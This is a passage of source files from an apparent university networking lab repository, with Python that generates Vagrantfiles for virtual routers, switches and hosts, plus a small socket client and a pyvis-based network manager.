edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n CustomScript = Router[\"custom_script\"]\n\n if Id == 1: \n tag = \"1\"\n if Id == 2: \n tag = \"2\" \n\n IpRouter2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter2 = ipcalc.Network(IpRouter2)\n IpNetRouter2 = str(NetworkRouter2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpRouter1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter1_1 = ipcalc.Network(IpRouter1_1)\n IpNetRouter1_1 = str(NetworkRouter1_1.network())\n \"\"\"\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = ipcalc.Network(IpSwitch_1)\n 
IpNetSwitch_1 = str(NetworkSwitch_1.network())\n \n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network())\n \n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n GatewaySwitch = network[2][\"network_interfaces\"][2][\"ip_address\"]\n GatewaySwitch = GatewaySwitch.split(\"/\")[0]\n\n GatewayRouter1 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n GatewayRouter1 = GatewayRouter1.split(\"/\")[0]\n\n GatewayRouter2 = network[1][\"network_interfaces\"][1][\"ip_address\"]\n GatewayRouter2 = GatewayRouter2.split(\"/\")[0]\n\n f.write(\"config.vm.define \\\"\" + Name+ \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub1 + \"\\\", netmask: \\\"\" + Netmask1 + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-\" + tag + \"\\\", auto_config: true\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub2 + \"\\\", netmask: \\\"\" + Netmask2 + \"\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n if Id == 1: \n f.write(\"sudo route add -net \" + IpRouter2 + \" netmask \" + NetmaskRouter2 + \" gw \" + GatewayRouter2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n if Id == 2: \n f.write(\"sudo route add -net \" + IpRouter1_1 + \" netmask \" + NetmaskRouter1_1 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 > 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + 
str(UplinkBandwidth2))\n        f.write('\\n')\n    f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n    f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n    f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n    f.write('sudo systemctl restart telegraf\\n')\n    f.write('sudo systemctl enable telegraf\\n')\n    f.write(CustomScript + \" \\n\") #here there is the custom script\n    f.write(\"echo \\\"Configuration END\\\"\\n\")\n    f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n    f.write(\"SHELL\\n\")\n    f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n    f.write(\"vb.memory = \" + Ram + \"\\n\")\n    f.write(\"end\\n\")\n    f.write(\"end\\n\")\n\n#this function writes in the vagrant file a new Switch\ndef writeSwitch(f, Switch, edges, network):\n\n    Id = Switch[\"id\"]\n    Name = Switch[\"label\"]\n    Ram = Switch[\"ram\"]\n    N_Cpus = Switch[\"n_cpus\"]\n    Os = Switch[\"vm_image\"]\n    CustomScript = Switch[\"custom_script\"]\n\n    IpA = Switch[\"network_interfaces\"][0][\"ip_address\"]\n    NetmaskA = Switch[\"network_interfaces\"][0][\"netmask\"]\n    InterfaceA = Switch[\"network_interfaces\"][0][\"name_interface\"]\n    EdgeReferenceA = Switch[\"network_interfaces\"][0][\"edge\"]\n    UplinkBandwidthA = 0\n    DownlinkBandwidthA = 0\n    for edge in edges:\n        if EdgeReferenceA[0] == edge[\"from\"] and EdgeReferenceA[1] == edge[\"to\"]:\n            UplinkBandwidthA = edge[\"bandwidth_up\"]\n            DownlinkBandwidthA = edge[\"bandwidth_down\"]\n\n    IpB = Switch[\"network_interfaces\"][1][\"ip_address\"]\n    NetmaskB = Switch[\"network_interfaces\"][1][\"netmask\"]\n    InterfaceB = Switch[\"network_interfaces\"][1][\"name_interface\"]\n    EdgeReferenceB = Switch[\"network_interfaces\"][1][\"edge\"]\n    UplinkBandwidthB = 0\n    DownlinkBandwidthB = 0\n    for edge in edges:\n        if EdgeReferenceB[0] == edge[\"from\"] and EdgeReferenceB[1] == edge[\"to\"]:\n            UplinkBandwidthB = edge[\"bandwidth_up\"]\n            DownlinkBandwidthB = edge[\"bandwidth_down\"]\n\n    IpSW = Switch[\"network_interfaces\"][2][\"ip_address\"]\n    NetmaskSW = Switch[\"network_interfaces\"][2][\"netmask\"]\n    InterfaceSW = Switch[\"network_interfaces\"][2][\"name_interface\"]\n    EdgeReferenceSW = Switch[\"network_interfaces\"][2][\"edge\"]\n    UplinkBandwidthSW = 0\n    DownlinkBandwidthSW = 0\n    for edge in edges:\n        if EdgeReferenceSW[0] == edge[\"from\"] and EdgeReferenceSW[1] == edge[\"to\"]:\n            UplinkBandwidthSW = edge[\"bandwidth_up\"]\n            DownlinkBandwidthSW = edge[\"bandwidth_down\"]\n\n    Gateway = network[0][\"network_interfaces\"][0][\"ip_address\"]\n    Gateway = Gateway.split(\"/\")[0]\n\n    IpRouter2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n    NetmaskRouter2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n    NetworkRouter2 = ipcalc.Network(IpRouter2)\n    IpNetRouter2 = str(NetworkRouter2.network())\n    \n    \"\"\"\n    Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n    Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n    Network2 = ipcalc.Network(Ip2)\n    IpNet2 = str(Network2.network())\n    \"\"\"\n\n    IpRouter1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n    NetmaskRouter1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n    NetworkRouter1_2 = ipcalc.Network(IpRouter1_2)\n    IpNetRouter1_2 = str(NetworkRouter1_2.network())\n    \"\"\"\n    Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n    Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n    Network4 = ipcalc.Network(Ip4)\n    IpNet4 = str(Network4.network())\n    \"\"\"\n\n    f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n    f.write(Name + \".vm.box = \\\"\" + 
Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[0][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[1][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\n f.write(\"apt-get update\\n\")\n f.write(\"apt-get install -y tcpdump\\n\")\n f.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\n f.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\n f.write(\"sudo ovs-vsctl add-br SW1\\n\")\n f.write(\"sudo ovs-vsctl add-br HA\\n\")\n f.write(\"sudo ovs-vsctl add-br HB\\n\")\n f.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\n f.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\n f.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\n f.write(\"echo \\\"Bridge configuration END\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\n f.write(\"sudo ifconfig SW1 \" + IpSW + \"\\n\")\n f.write(\"sudo ifconfig HA \" + IpA + \"\\n\")\n f.write(\"sudo ifconfig HB \" + IpB + \"\\n\")\n f.write(\"sudo ifconfig SW1 up\\n\")\n f.write(\"sudo ifconfig HA up\\n\")\n f.write(\"sudo ifconfig HB up\\n\")\n f.write(\"sudo ifconfig eth1 up\\n\")\n f.write(\"sudo ifconfig eth2 up\\n\")\n f.write(\"sudo ifconfig eth3 up\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + IpRouter2 +\" netmask \" + NetmaskRouter2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"sudo route add -net \" + IpRouter1_2 +\" netmask \" + NetmaskRouter1_2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidthA > 0 or DownlinkBandwidthA > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceA)\n if DownlinkBandwidthA > 0:\n f.write(' -d ' + str(DownlinkBandwidthA))\n if UplinkBandwidthA > 0:\n f.write(' -u ' + str(UplinkBandwidthA))\n f.write('\\n')\n\n if UplinkBandwidthB > 0 or DownlinkBandwidthB > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceB)\n if DownlinkBandwidthB > 0:\n f.write(' -d ' + str(DownlinkBandwidthB))\n if UplinkBandwidthB > 0:\n f.write(' -u ' + str(UplinkBandwidthB))\n f.write('\\n')\n \n if UplinkBandwidthSW > 0 or DownlinkBandwidthSW > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceSW)\n if DownlinkBandwidthSW > 0:\n f.write(' -d ' + str(DownlinkBandwidthSW))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidthSW))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n 
f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\"+ Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram +\"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n \n \n\n \n\n\n\n\"\"\"\n#the following is a fake graph that i used for testing\n#instead of typing everytime the input in the command line\nhost1 = (1,{\n \"Id\" : 1,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost2 = (2,{\n \"Id\" : 2,\n \"Name\":\"host2\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.12.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost3 = (3,{\n \"Id\" : 3,\n \"Name\":\"host3\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.5/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (4,{\n \"Id\" : 4,\n \"Name\": \"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.3.5/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.9/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nrout2 = (5,{\n \"Id\" : 5,\n \"Name\":\"router2\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.10/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.10/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nswitch1 = (6,{\n \"Id\" : 6,\n \"Name\":\"switch1\",\n \"Type\": \"Switch\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HA\"\n },{\n \"Ip\": \"172.16.12.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HB\"\n },{\n \"Ip\": \"172.16.3.2/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"SW1\"\n }]\n})\n\nfakeNet = [host1,host2,host3,rout1,rout2,switch1]\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"router\":\n writeRouter(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"switch\":\n writeSwitch(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges, nodes) \n VagrantFile.write('end\\n')\n VagrantFile.close()\n\n\n #read the data structure from input\n #Network = G.nodes.data():\n #Network = fakeNet\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n\n #first, let's write the beginnig of the VagrantFile\n #BeginVagrantFile(VagrantFile,Network)\n\n\n #second, let's write each device with his 
feature\n #this topology has 3 hosts, 1 switch and 3 routers\n #for device in Network:\n #call the respective function to \"populate\" the vagrant file\n # typeOfDevice = device[1][\"Type\"]\n # print(\"the device is a \" + typeOfDevice)\n\n # if typeOfDevice is \"Router\":\n # writeRouter(VagrantFile,device,Network)\n\n #for device in Network:\n #call the respective function to \"populate\" the vagrant file\n # typeOfDevice = device[1][\"Type\"]\n # print(\"the device is a \" + typeOfDevice)\n # if typeOfDevice is \"Switch\":\n # writeSwitch(VagrantFile,device,Network)\n\n\n #for device in Network:\n #call the respective function to \"populate\" the vagrant file\n # typeOfDevice = device[1][\"Type\"]\n # print(\"the device is a \" + typeOfDevice)\n # if typeOfDevice is \"Host\":\n # writeHost(VagrantFile,device,Network)\n\n\n"
},
{
"alpha_fraction": 0.677859365940094,
"alphanum_fraction": 0.7040923237800598,
"avg_line_length": 24.105262756347656,
"blob_id": "5d00a768e5ec92aab4d036a8f54929be33f0f597",
"content_id": "cc10ff4f2dbae1357394bea78f0c48ddf4d72156",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 953,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 38,
"path": "/Server and Client/oldstuff/client.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import socket\nimport psutil #this import was added by luca\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\nSERVER = \"192.168.53.133\"\nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\ndef send(msg):\n message = msg.encode(FORMAT)\n msg_length = len(message)\n send_length = str(msg_length).encode(FORMAT)\n send_length += b' ' * (HEADER - len(send_length))\n client.send(send_length)\n client.send(message)\n print(client.recv(2048).decode(FORMAT))\n\n#this function return the percentage of RAM in use by the machine\ndef Ram_data_perc():\n return (psutil.virtual_memory().available * 100 / psutil.virtual_memory().total)\n\n#this function return the percentage of CPU in use by the machine\ndef Cpu_data_perc():\n return (psutil.cpu_percent()) \n\n\nsend(\"Hello World!\")\ninput()\nsend(\"Hello Everyone!\")\ninput()\nsend(\"Hello uzair!\")\n\nsend(DISCONNECT_MESSAGE)"
},
{
"alpha_fraction": 0.5451778769493103,
"alphanum_fraction": 0.5517321825027466,
"avg_line_length": 31.86153793334961,
"blob_id": "9fb8c15523bb1b51f2706e315bd5b4e77af37255",
"content_id": "e48905e326549c5476c257bdf2a7816d0f5ce943",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4272,
"license_type": "permissive",
"max_line_length": 269,
"num_lines": 130,
"path": "/network_core.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "\"\"\" _____________________________________________________________\n\n Description: Network entity manager code\n Author: Giuseppe Superbo ([email protected])\n Date: Winter 2020-2021\n Course: Design of Networks and Communication Systems\n _____________________________________________________________\n\"\"\"\n\nfrom pyvis.network import Network\nimport json\nimport os\n\n\ndef create_network():\n \"\"\"Function that creates an empty network.\n\n Parameters:\n - network_name: name of the network\n \n Returns:\n - G: network object\n\n \"\"\"\n G = Network()\n return G\n\ndef open_network(network_path):\n \"\"\"Function that imports a network from an html file.\n\n Parameters:\n - network_path: path of the network to be imported\n \n Returns:\n - G: network object\n\n \"\"\"\n G = Network()\n html = open(network_path, \"r\")\n lines_html = html.readlines()\n nodes = \"\"\n edges = \"\"\n\n for line in lines_html:\n if \"nodes = new\" in line:\n nodes = json.loads(line.split('(')[1].split(')')[0])\n if \"edges = new\" in line:\n edges = json.loads(line.split('(')[1].split(')')[0])\n \n dictionary_to_nodes(nodes, G)\n dictionary_to_edges(edges, G)\n\n G.save_graph(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n\n html_fix(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n\n return G\n \n\ndef dictionary_to_nodes(dictionary, network):\n \"\"\"Procedure that adds new nodes to a network by parsing a dictionary\n\n Parameters:\n - dictionary: dictionary that contains the new nodes;\n - network: network to be updated.\n\n \"\"\"\n for node in dictionary:\n network.add_node(node[\"id\"], image=node[\"image\"], label=node[\"label\"], shape=node[\"shape\"], type=node[\"type\"], network_interfaces=node[\"network_interfaces\"], vm_image=node[\"vm_image\"], ram=node[\"ram\"], n_cpus=node[\"n_cpus\"], custom_script=node[\"custom_script\"])\n\n\ndef dictionary_to_edges(dictionary, network):\n \"\"\"Procedure that adds new edges to a network by parsing a dictionary\n\n Parameters:\n - dictionary: dictionary that contains the new edges;\n - network: network to be updated.\n\n \"\"\"\n for edge in dictionary:\n network.add_edge(edge[\"from\"],edge[\"to\"], bandwidth_up=edge[\"bandwidth_up\"], bandwidth_down=edge[\"bandwidth_down\"])\n\ndef nodes_search_type(network, search_type):\n \"\"\"Function that returns only a specific type of nodes of a network\n\n Parameters:\n - search_type: type of nodes that should be returned;\n - network: network as source.\n\n Returns:\n - result: dictionary that contains the result of the search.\n \"\"\"\n nodes = network.nodes\n result = []\n for node in nodes:\n if search_type == \"others\":\n if node[\"type\"] not in [\"router\", \"host\", \"switch\"]:\n result.append(node)\n elif node[\"type\"] == search_type:\n result.append(node)\n return result\n \n\ndef html_fix(html_path):\n \"\"\"Procedure that fixes the css style of the network graph visualization\n\n Parameters:\n - html_path: absolute path of the html to be fixed\n \"\"\"\n old_html = open(os.path.abspath(html_path), \"r\")\n lines = old_html.readlines()\n old_html_data = old_html.read()\n old_html.close()\n new_html = open(os.path.abspath(html_path), \"w\")\n for line in lines:\n if line.strip(\"\\n\") != \"<center>\" and line.strip(\"\\n\") != \"<h1>None</h1>\" and line.strip(\"\\n\") != \"</center>\":\n if line.strip(\"\\n\") == \" width: 500px;\":\n new_html.write(' width: 990px;\\n')\n continue\n if line.strip(\"\\n\") == \" height: 500px;\":\n new_html.write(' height: 
600px;\\n')\n continue\n if line.strip(\"\\n\") == \" position: relative;\":\n new_html.write(' position: center;\\n')\n continue\n if line.strip(\"\\n\") == \" border: 1px solid lightgray;\":\n new_html.write(\" border: 0px solid lightgray;\\n\")\n continue\n new_html.write(line)\n new_html.close()\n"
},
{
"alpha_fraction": 0.6019653677940369,
"alphanum_fraction": 0.6765236258506775,
"avg_line_length": 52.30769348144531,
"blob_id": "e6ba7b7c35db4eb9dd9ed65aa4c4c3f4acf08cd4",
"content_id": "daedf639bf41b06a9af9d3e8ab26850b8366dff4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11092,
"license_type": "permissive",
"max_line_length": 235,
"num_lines": 208,
"path": "/fromHTMLtoVagrant/OldScripts/VagrantScriptCreatorInTextFormat.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\n\n\n# In[24]:\n\n\n## Our motive is to generate only one single vagrant file.##\n## we will try to make a generic file as much as possible. since it's a test-based project/not a production based##\n## we will allow our user's limited choices to selects the combinations. So, things will not get complicated either for the user either for us.##\n## for example we only allow users to give the IP addresses.##\n## VM topologies will already be defined and created you can see the given topology below.\n\nf = open(\"vagrant.txt\", \"w\")\nf.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\nf.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\nf.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\nf.write(\"config.vm.box_check_update = true\\n\")\nf.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.cpus = 1\\n\")\nf.write(\"end\\n\")\n#######################################################################################\n\n## we can give the user right to change the Virtual machine name as they wanted. But it's optional, not mandatory.\n\n#vm = input(\"Enter your VM name:\")\n#f.write(\"config.vm.define\" \" \" + vm)\nf.write(\"config.vm.define \\\"router-1\\\" do |router1|\\n\")\nf.write(\"router1.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router1.vm.hostname = \\\"router-1\\\"\\n\")\n# User can selecte the desire IP addresses according to the requirements.\nf.write(\"router1.vm.network \\\"private_network\\\", ip: \\\"172.16.3.5\\\", netmask: \\\"255.255.255.240\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: true\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", ip: \\\"172.16.4.9\\\",netmask: \\\"255.255.255.252\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\nf.write(\"router1.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n# we need to automate IP addressing according to the network/IP selection\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.4.10 dev eth2\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--1 is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"router1.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n# User can select the desired menmory for the machine. 
based on the application usage.\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"router-2\\\" do |router2|\\n\")\nf.write(\"router2.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router2.vm.hostname = \\\"router-2\\\"\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", ip: \\\"172.16.2.10\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", ip: \\\"172.16.4.10\\\", netmask: \\\"255.255.255.252\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\nf.write(\"router2.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.4.9 dev eth2\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 